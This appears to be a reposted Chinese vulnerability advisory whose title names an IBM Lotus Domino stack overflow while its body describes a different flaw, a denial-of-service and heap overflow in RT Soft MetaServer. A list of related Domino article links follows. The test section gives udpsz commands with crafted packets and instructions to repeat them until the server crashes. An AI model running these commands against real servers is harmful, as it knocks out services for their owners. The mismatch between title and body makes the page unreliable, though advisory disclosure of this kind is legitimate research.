IBM Lotus Domino “NSFComputeEvaluateExt()”函数远程栈缓冲区

liaoxuewu 2011-09-22

发布日期：2011-09-21
更新日期：2011-09-21

受影响系统：
RT Soft MetaServer 3.2.1.450
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 49696

MetaServer RT是实时的数据处理和计算软件。

MetaServer RT在处理发送到TCP端口2194的恶意报文时存在拒绝服务漏洞，可被远程攻击者利用造成应用程序崩溃。

通过发送到2189、2192、2194的特制报文和不断的重复连接，可造成堆溢出。使用了"MESSA"和"ROSCO"命令。

<*来源：Luigi Auriemma （[email protected]）

链接：http://aluigi.altervista.org/adv/metaserver_1-adv.txt
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://aluigi.org/testz/udpsz.zip

A]
udpsz -C "cdab0000 00000000 ffff0000 00000000 ffffffff 524f53434f" -l 0 -T -1 SERVER 2189 0xffff

stop after at least 50 dots and relaunch the command again till the
crashing of the server during a memcpy.

B]
udpsz -b 0x80 -T SERVER 2194 1000
udpsz -C "cdab0000 00000000 00ffffff 00000000 00000000 524f53434f" -T SERVER 2189 -1
...others...

建议：
--------------------------------------------------------------------------------
厂商补丁：

RT Soft
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.traderssoft.com/ts/msrt/

: liaoxuewu

相关推荐

web 部署专题(八)：Nginx 反向代理中cookie相关问题

Domino服务器中，通过写了一些接口代码，提供RESTful的服务，来对手机端进行提供服务。但是由于原来的环境，没有SSO，而且不通过认证，没法访问到Domino里面的接口代码。问题4：“问题3”的解决方案，由于经过了反向代理，导致Domino的Resp

OwenJi 0喜欢 / 0评论 2020-04-18

[LC] 1007. Minimum Domino Rotations For Equal Row

In a row of dominoes,A[i]andB[i]represent the top and bottom halves of thei-th domino. . We may rotate thei-th domino, so thatA[

luvhl 0喜欢 / 0评论 2020-02-11

codeforces 1269D. Domino for Young （二分图证明/结论题）

题意：给一个不规则的网格，在上面放置多米诺骨牌，多米诺骨牌长度要么是1x2，要么是2x1大小，问最多放置多米诺骨牌的数量。这个结论可以用二分图进行证明：把问题抽象成最大二分图匹配，每两个点之间连一条边。所以只要在另一种颜色格子数量充沛的情况下，每一次匹配都

liaoxuewu 0喜欢 / 0评论 2020-01-04

在Linux中安装与配置Domino服务器教程

　　作为IBM系列产品全面支持Linux的一部分，Domino Server从R5.0.2开始提供了对Linux的支持。最新的Domino Server包括了1000多项全新和增强特性，还改进了邮件存档、邮件日记和垃圾邮件控制等功能。今天我就给大家介绍一下

Linuxest 0喜欢 / 0评论 2007-08-22

Domino服务器配置详细过程

配置服务器一共有两种：1.配置新的服务器2.删除原有服务器，再次安装。这想这里指的安装并不是教你如何用张Domino服务器安装在机器上，主要是为了教你们如何配置服务器。

CWeeYii 0喜欢 / 0评论 2007-06-28

Domino从UNIX平台到Windows平台的迁移及备份[图文]

单位机房的一台服务机器到折旧期了，换成了新购IBM机器X3950,而且都预装了Windows 2003 Server 标准版，所以只有把以前在Unix平台下跑的OA系统迁移到新的Windows 2003平台上来。

iiichigo 0喜欢 / 0评论 2009-01-07

@codeforces - [email protected] Balanced Domino Placements

给定一个 h 行 w 列的方格图，上面已经放置了一些 1*2 的多米诺骨牌。我们称一个放置多米诺骨牌的方案是好的，当且仅当任何两个多米诺骨牌不占用相同的行与列。现在需要你在方格图上新增若干个多米诺骨牌，使得最后得到的方格图仍然是好的。第一行包含 3 个整数

liaoxuewu 0喜欢 / 0评论 2019-10-26

关于Java程序调用Lotus Notes邮件服务发送邮件的实现（一思路）

Lotus Notes/Domino 是企业级通讯、协同工作及Internet/Intranet平台；内含强大的电子邮件功能，应用于企业办公自动化。总的来讲，Lotus Notes 软件是C/S架构的：客户端称为Notes，服务器端称为Domino；另外，

小菜鸟 0喜欢 / 0评论 2013-01-11

AIX CP 拷贝输入错误日志

原路径：/kmdata/kmdata. 原路径：/domino. ps -ef | grep cp. ps -ef | grep 536780. ps-ef|grep786612

raindew 0喜欢 / 0评论 2010-10-23

lotus designer 8.5中创建JAVA代理（转自genusBIT的空间）

在开发LotusDomino数据库的过程之中，开发人员可以创建Java代理程序，方便将LotusNotesJavaAPI和任何第三方的Java类库整合到Domino数据库中，使得Notes数据库具有强大的可扩展性。我们需要批量地从这些Notes文档中提取出

kenvie 0喜欢 / 0评论 2012-04-10

UNIX + OS IBM AIX AS/400

5.9业务相关的数据库设计、系统分析...

iiichigo 0喜欢 / 0评论 2010-03-30

IBM Lotus

SAMETIME客户端安装指南.doc

DodderB 0喜欢 / 0评论 2010-08-13

Lotus Domino

hyMiss 0喜欢 / 0评论 2010-05-10

T立方:OA开发技术全科普

软件开技术作为OA办公系统的生命力赋予者，毫无疑问其“好坏”也影响着OA的“好坏”，因此在选型之前了解各开发技术的优劣，对于选型OA来说将会是极大的助力。下面给大家介绍OA办公系统常见四大开发技术。Domino/Notes是一个集文档数据库、邮件系统、动态

domino 0喜欢 / 0评论 2017-03-03

LotusScript可以做什么？

6.可以使用Domino/Notes上Administrator的权限

JackXue程序生涯 0喜欢 / 0评论 2012-06-02

What is LotusScript ?

Java is used to code the Eclipse/Lotus Expeditor framework in which Notes Standard configuration is extended and "injected&

huangshuailei 0喜欢 / 0评论 2012-06-02

FineReport中Domino数据库连接方法

用其来添加notes配置文件和id文件，如下图所示：。添加notes.ini所在目录到系统path环境变量中，如下图所示：

domino 0喜欢 / 0评论 2015-12-15

NotesException: Could not open Notes session: org.omg.CORBA.COMM_FAILURE:

java连接Domino通过的是diiop服务，因此要确保diiop服务器的启动；

JackXue程序生涯 0喜欢 / 0评论 2011-04-26

Domino中使用Java访问Webservice(三)

在LotusDesigner开发工具中可以使用Java编写Webservice以及访问Webservice。这里只介绍一下如何访问Websercice。最后在Designer中创建一代理，可以使用java编写代理，也可以使用Lotusscript编写代理，

huangshuailei 0喜欢 / 0评论 2011-02-11

解读notes.ini——JavaUserClasses

问题1：notes.ini参数JavaUserClasses的作用是什么？如果一个Java代理要调用包含本地方法的其他类，必须保证该类是由JVM装入的。为了确保这一点，需要把包含本地方法的类的文件名添加到以下参数中：。设置此参数后，该类由JVM装入，就不受

CrazyNotes 0喜欢 / 0评论 2010-08-13

利用Notes的JAVA api发送邮件(代码片段)

这两个类就是完整的代码,调用sendMail()就可以发送邮件了,光有代码是不能发送的,现在我们来说说环境的搭建,首先要安装LotusNotes客护端,然后我们需要两个JAR包Notes.jar和NCSO.jar,把D:\lotus\notes加到patc

Qiluluwawa 0喜欢 / 0评论 2010-06-27

IBM 操作lotus notes

LotusNotes/Domino和WebSpherePortal是IBMLotus家族中的两大产品。本文将向读者介绍一个WebSpherePortal与LotusNotes/Domino集成的实例-如何创建一个迷你型的日历Portlet。该Portlet

panmezihuan0 0喜欢 / 0评论 2010-06-23

使用 Lotus Notes 和 Eclipse 管理和运行 Java 程序

将它们组合在一起，可以使Notes/Domino开发人员充分利用其常用开发环境DominoDesigner中目前可用的所有Java代码和包。Eclipse大概是最好的集成开发环境之一，它提供了非常丰富的特性，其中包括上下文相关操作、视图、富调试程序和重构。

CrazyNotes 0喜欢 / 0评论 2010-06-23

java可以访问操作lotus domino数据库吗?

jdbc方式应该不能在jsp或javabean中使用吧，因为它会弹出密码输入框让你输入密码的；使用corba应该是可以的；第一种方式就不知道了，因为它要依靠客户端的。

huangshuailei 0喜欢 / 0评论 2010-06-23

使用 Lotus Notes 和 Eclipse 管理和运行 Java 程序

将它们组合　　起，可以使Notes/Domino开发　员充分利用其常用开发环境DominoDesigner中目前可用　所　Java代码和包。Eclipse大概　最好　集成开发环境之　，它提供　非常丰富　特性，其中包括上下文相关操作、视图、富调试程序和重构。

Qiluluwawa 0喜欢 / 0评论 2010-06-23

sametime + domino + notes

}tokenGenerated不是及时执行，项目中先采取了Thread.sleep;想到更好的方法以后再来更新。

liuttorrie 0喜欢 / 0评论 2010-05-05

Lotus 复制技术浅述

Domino/Notes独特的复制技术是业界争相效仿的对象,但是迄今为止还没有任何一家在此技术领域能达到LotusDomino/Notes的技术层次。为群件系统关键技术，曾经帮助Domino/Notes赢得无数荣誉。望我们的解释能消除你们对此技术的疑虑。为

liuttorrie 0喜欢 / 0评论 2008-02-29

关于domino用odbc连接db2注意事项

今天在windows200764位的系统下安装db2，原应用程序是dominoR8.5.164位，在64位Windows系统中，默认“数据源”是64位的，包括“控制面板-》管理工具-》数据源”或在“运行”中直接运行“ODBCAD32”程序。安装上面的作法，

luck 0喜欢 / 0评论 2012-06-25

开发基于 IBM Lotus Domino 的 Web 2.0 应用的最佳实践

Domino 是 IBM Lotus 下面的一个旗舰产品，由于其提供了多层级的安全解决方案，内置集成的协同服务应用和目录服务并提供灵活的数据库复制机制，因成为很多企业应用的重要平台。对于 Domino 用户而言，能否平滑快速的实现这一目标呢？从上面图 2

汤姆猴 0喜欢 / 0评论 2011-11-25

Domino BS中使用submit后执行关闭窗口问题

当表单所以任务执行完成以后才执行"$$Return"域中的代码，返回相应结果给浏览器。

JAVALin 0喜欢 / 0评论 2011-02-25

JAVA连接Domino服务器收发邮件代码示例

JAVA连接Domino服务器收发邮件代码示例今天在公司整理Domino代码时，顺手写了几个测试代码，晚上回顾时，发现基本涵盖了邮件操作的相关方面，记录之，供以后参考。代码示例代码很简单，直接复制，有不明白的查询相关API即可。

小木可 0喜欢 / 0评论 2010-06-17

一个披萨电影夜，你到底泄露了多少个人数据？

最近Facebook在处理和保护用户数据方面的危机骇人听闻，恐惧的同时也让人们反思，大量的个人数据泄漏到底来自哪里？本文我们将假设这样一个场景，你和你的朋友准备度过一个披萨电影夜，让我们用这个常见的场景为例，来评估一下，仅用一个披萨的价格，有多少数据在不知

flywaterfree 0喜欢 / 0评论 2018-04-26

Ubuntu下安装Domino 8.5

最近公司项目需要安装双系统。由于公司使用Lotus domino 软件。Ubuntu最低支持domino8.5版本。下面是安装过程及一些问题的解决。notes-gtk-libs.tar.gz ibm-lotus-notes-8.5.1.i586.deb l

CrazyNotes 0喜欢 / 0评论 2011-06-14

Java代理实现domino web邮件下载

近日在研究domino web邮件下载功能，下载的邮件可以导入foxmail、outlook邮件客户端，下载的邮件格式为eml。

Yakamoz 0喜欢 / 0评论 2014-07-24

Linux下搭建Lotus Domino集群

本文内容是Linux平台下Lotus Domino服务器部署案例的另一个模块，所以大家首先要有以上基础之后然后继续实验。集群是 Lotus Domino Server 提供的最重要特性之一。对于任何使用 Domino 服务器的组织，让用户能够持续访问它们的

liuyuchen 0喜欢 / 0评论 2013-12-12

Linux平台下Lotus Domino服务器部署案例

几年前我写了篇《RHAS2.1下安装中文LotusDominoR6.5图解》这篇文档被多个大型网站转载，曾帮助过很多公司系统管理员部署Lotus系统。目前公司把OA平台升级至Domino 8.5,下面将8.0的安装方法总结一下分享给大家。在IBM X86服

Linuxdream0 0喜欢 / 0评论 2013-12-11

IBM Lotus Quickr for Domino ActiveX Control缓冲区溢出漏洞(

受影响系统：IBM Lotus Quickr 8.xIBM Lotus Quickr qp2 ActiveX Control描述：---------------------------------------------------------------

Norther 0喜欢 / 0评论 2013-06-15

Ubuntu 13.04安装 Domino Server 9

首先确认服务器的smtp，pop，imap，http服务没有被占用，当然我们在安装服务器的时候没有选择安装其它的服务，可以省略。我安装的是中文的ubuntu，但是装的英文版的 domino server 9，所以在setup的时候会有语言问题，所以将ubu

wtbapi 0喜欢 / 0评论 2013-08-19

IBM Lotus Domino Java Console身份验证绕过漏洞

受影响系统：IBM Lotus Domino 8.5.3IBM Lotus Domino 8.5.2IBM Lotus Domino 8.5.1IBM Lotus Domino 8.5描述：---------------------------------

rugl 0喜欢 / 0评论 2013-04-02

IBM Lotus Domino 拒绝服务漏洞(CVE-2013-0486)

受影响系统：IBM Lotus Domino 8.5.3IBM Lotus Domino 8.5.2IBM Lotus Domino 8.5.1IBM Lotus Domino 8.5描述：---------------------------------

owenson 0喜欢 / 0评论 2013-03-26

IBM Lotus Domino 跨站请求伪造漏洞(CVE-2013-0489)

受影响系统：IBM Lotus Domino 8.5.3IBM Lotus Domino 8.5.2IBM Lotus Domino 8.5.1IBM Lotus Domino 8.5描述：---------------------------------

domino 0喜欢 / 0评论 2013-03-25

IBM Lotus Domino HTTP响应分离和跨站脚本执行漏洞

受影响系统：IBM Lotus Domino 8.x描述：--------------------------------------------------------------------------------CVE ID: CVE-2012-33

domino 0喜欢 / 0评论 2012-08-22

Ubuntu IBM将强化Web 2.0功能

Ubuntu IBM还是比较常用的，于是我研究了一下Ubuntu IBM，在这里拿出来和大家分享一下，希望对大家有用。Ubuntu IBM在针对Lotus Notes/Domino客户举办的Lotusphere年度会议中揭露了Lotus Notes/Dom

qizhuohui 0喜欢 / 0评论 2010-03-04

IBM Lotus Domino RPC操作拒绝服务漏洞

受影响系统：IBM Lotus Domino 8.x不受影响系统：IBM Lotus Domino 8.5.3IBM Lotus Domino 8.5.2 FP4描述：--------------------------------------------

rugl 0喜欢 / 0评论 2011-12-27

IBM Lotus Domino Notes RPC 身份验证处理拒绝服务漏洞

受影响系统：IBM Lotus Domino 8.x描述：--------------------------------------------------------------------------------CVE ID: CVE-2011-13

gjcxywwx 0喜欢 / 0评论 2011-12-24

IBM Lotus Domino “PanelIcon”参数跨站脚本执行漏洞

受影响系统：IBM Lotus Domino 8.5.2描述：--------------------------------------------------------------------------------BUGTRAQ ID: 49701

jacky 0喜欢 / 0评论 2011-09-24

IBM Lotus Domino iCalendar会议请求解析远程栈缓冲区溢出漏洞

受影响系统：IBM Lotus Domino <= 8.0.2描述：--------------------------------------------------------------------------------BUGTRAQ ID:

owenson 0喜欢 / 0评论 2011-02-14

IBM Lotus Domino Server “diiop”多个远程代码执行漏洞

受影响系统：IBM Lotus Domino <= 8.5.2描述：--------------------------------------------------------------------------------BUGTRAQ ID:

majwit 0喜欢 / 0评论 2011-02-12

IBM Lotus Domino SMTP多个文件名参数远程缓冲区溢出漏洞

受影响系统：IBM Lotus Domino描述：--------------------------------------------------------------------------------BUGTRAQ ID: 46245. Lotu

wonderfulideas 0喜欢 / 0评论 2011-02-11